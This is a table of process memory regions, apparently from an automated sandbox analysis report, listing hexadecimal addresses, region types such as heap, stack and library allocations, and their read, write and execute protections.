||
1EF51EA3000
|
trusted library allocation
|
page read and write
|
||
7FF83B87C000
|
trusted library allocation
|
page execute and read and write
|
||
24593D32000
|
heap
|
page read and write
|
||
7FF83B850000
|
trusted library allocation
|
page execute and read and write
|
||
2DB308B2000
|
heap
|
page read and write
|
||
204E7458000
|
heap
|
page read and write
|
||
955B77F000
|
stack
|
page read and write
|
||
1A8DDB70000
|
heap
|
page read and write
|
||
7FF83B932000
|
trusted library allocation
|
page read and write
|
||
7FF83BA60000
|
trusted library allocation
|
page read and write
|
||
189FDFA8000
|
heap
|
page read and write
|
||
7FF83B9E0000
|
trusted library allocation
|
page read and write
|
||
7FF83BA40000
|
trusted library allocation
|
page read and write
|
||
1EF61CE8000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
189FC170000
|
heap
|
page read and write
|
||
245935C5000
|
heap
|
page read and write
|
||
7FF83B9F0000
|
trusted library allocation
|
page read and write
|
||
7FF83B7C0000
|
trusted library allocation
|
page read and write
|
||
2546B7B8000
|
heap
|
page read and write
|
||
2546BF37000
|
heap
|
page read and write
|
||
883C37D000
|
stack
|
page read and write
|
||
2178CB7D000
|
heap
|
page read and write
|
||
1EF51C60000
|
heap
|
page read and write
|
||
5399BFE000
|
stack
|
page read and write
|
||
2DB4A8C5000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
2546B744000
|
heap
|
page read and write
|
||
2390C4DD000
|
trusted library allocation
|
page read and write
|
||
24593ABE000
|
heap
|
page read and write
|
||
7FF7A1980000
|
unkown
|
page read and write
|
||
245935CA000
|
heap
|
page read and write
|
||
204E74B4000
|
heap
|
page read and write
|
||
2546BC55000
|
heap
|
page read and write
|
||
245919C5000
|
heap
|
page read and write
|
||
7FF83BA80000
|
trusted library allocation
|
page read and write
|
||
204E74B0000
|
heap
|
page read and write
|
||
2178CB49000
|
heap
|
page read and write
|
||
1C4D048A000
|
heap
|
page read and write
|
||
1BA58CC0000
|
heap
|
page read and write
|
||
955B87E000
|
stack
|
page read and write
|
||
24593A7C000
|
heap
|
page read and write
|
||
1BA72BF0000
|
heap
|
page execute and read and write
|
||
24593A68000
|
heap
|
page read and write
|
||
1BA72CA4000
|
heap
|
page read and write
|
||
64F52F5000
|
stack
|
page read and write
|
||
139D8A5E000
|
heap
|
page read and write
|
||
24593D68000
|
heap
|
page read and write
|
||
1C4CE1E5000
|
heap
|
page read and write
|
||
2546BB7F000
|
heap
|
page read and write
|
||
2546B798000
|
heap
|
page read and write
|
||
2391BF20000
|
trusted library allocation
|
page read and write
|
||
1EF4FEC0000
|
trusted library allocation
|
page read and write
|
||
2546BC50000
|
heap
|
page read and write
|
||
7FF83B87C000
|
trusted library allocation
|
page execute and read and write
|
||
2DB32210000
|
heap
|
page read and write
|
||
204E7C5C000
|
heap
|
page read and write
|
||
1C4D04D1000
|
heap
|
page read and write
|
||
1A7C6826000
|
heap
|
page read and write
|
||
1A7C6829000
|
heap
|
page read and write
|
||
1A7C4C95000
|
heap
|
page read and write
|
||
2459171E000
|
heap
|
page read and write
|
||
254699B6000
|
heap
|
page read and write
|
||
1C4D084D000
|
heap
|
page read and write
|
||
1C4D07D8000
|
heap
|
page read and write
|
||
1BA5AB0E000
|
trusted library allocation
|
page read and write
|
||
1C4CE1C9000
|
heap
|
page read and write
|
||
85F407E000
|
stack
|
page read and write
|
||
1EF61F62000
|
trusted library allocation
|
page read and write
|
||
204E7F7B000
|
heap
|
page read and write
|
||
21055DE0000
|
heap
|
page execute and read and write
|
||
174D5022000
|
trusted library allocation
|
page read and write
|
||
91B127F000
|
stack
|
page read and write
|
||
F5098FE000
|
stack
|
page read and write
|
||
1A7C6830000
|
heap
|
page read and write
|
||
2D4A37E000
|
stack
|
page read and write
|
||
7FF83B890000
|
trusted library allocation
|
page execute and read and write
|
||
18980114000
|
trusted library allocation
|
page read and write
|
||
7FF83B9B0000
|
trusted library allocation
|
page execute and read and write
|
||
9FC49CD000
|
stack
|
page read and write
|
||
1C4D0004000
|
heap
|
page read and write
|
||
139D8C40000
|
remote allocation
|
page read and write
|
||
24593D38000
|
heap
|
page read and write
|
||
1A8DDCE0000
|
heap
|
page read and write
|
||
24593A9A000
|
heap
|
page read and write
|
||
7FF83BA10000
|
trusted library allocation
|
page read and write
|
||
24591746000
|
heap
|
page read and write
|
||
204E7C63000
|
heap
|
page read and write
|
||
7FF83BAA0000
|
trusted library allocation
|
page read and write
|
||
1C4CE4E9000
|
heap
|
page read and write
|
||
1FBCD828000
|
trusted library allocation
|
page read and write
|
||
1A7C6470000
|
heap
|
page read and write
|
||
2080FEE3000
|
trusted library allocation
|
page read and write
|
||
245917AB000
|
heap
|
page read and write
|
||
217A6DCC000
|
heap
|
page read and write
|
||
7FF83BA50000
|
trusted library allocation
|
page read and write
|
||
1C4D02B2000
|
heap
|
page read and write
|
||
2546B781000
|
heap
|
page read and write
|
||
7FF83BAD0000
|
trusted library allocation
|
page read and write
|
||
1C4D0021000
|
heap
|
page read and write
|
||
1006BE000
|
stack
|
page read and write
|
||
217A6E43000
|
heap
|
page read and write
|
||
1AA517C2000
|
trusted library allocation
|
page read and write
|
||
FE1ACFE000
|
stack
|
page read and write
|
||
139D8A45000
|
heap
|
page read and write
|
||
24593A8F000
|
heap
|
page read and write
|
There are 2886 hidden memdumps, click here to show them.